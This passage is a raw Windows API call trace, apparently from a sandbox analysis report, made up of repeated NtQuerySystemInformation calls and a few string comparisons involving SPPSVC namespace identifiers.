SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0230.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x20, ResultLength=0x0) [0230.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x20, ResultLength=0x0) [0230.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x20, ResultLength=0x0) [0230.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0230.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0230.705] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0230.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0230.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0230.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0230.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0230.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0230.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0230.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0230.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0230.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0230.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0230.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0230.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0230.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0230.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0230.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0230.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0230.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0230.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0230.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0230.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0230.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0230.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0230.769] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0230.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0230.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0230.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0230.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0230.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0230.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0230.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0230.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0230.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0230.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0230.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0230.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0230.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0230.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0230.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0230.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0230.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0230.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0230.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0230.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0230.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0230.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0230.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0230.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0230.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0230.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0230.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0230.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0230.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0230.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0230.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0230.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0230.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd450, Length=0x28, ResultLength=0x0) [0230.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0230.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4d0, Length=0x28, ResultLength=0x0) [0230.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4d0, Length=0x28, ResultLength=0x0) [0230.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x20, ResultLength=0x0) [0230.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x20, ResultLength=0x0) [0230.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x20, ResultLength=0x0) [0230.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x20, ResultLength=0x0) [0230.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0230.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0230.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x20, ResultLength=0x0) [0230.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0230.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0230.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x50, ResultLength=0x0) [0230.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x28, ResultLength=0x0) [0230.792] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0230.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x50, ResultLength=0x0) [0230.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x50, ResultLength=0x0) [0230.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd610, Length=0x50, ResultLength=0x0) [0230.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd590, Length=0x28, ResultLength=0x0) [0230.793] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0230.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd610, Length=0x50, ResultLength=0x0) [0230.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd610, Length=0x50, ResultLength=0x0) [0230.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd610, Length=0x50, ResultLength=0x0) [0230.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x38, ResultLength=0x0) [0230.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x28, ResultLength=0x0) [0230.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x28, ResultLength=0x0) [0230.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x28, ResultLength=0x0) [0230.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0230.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x38, ResultLength=0x0) [0230.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x28, ResultLength=0x0) [0230.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 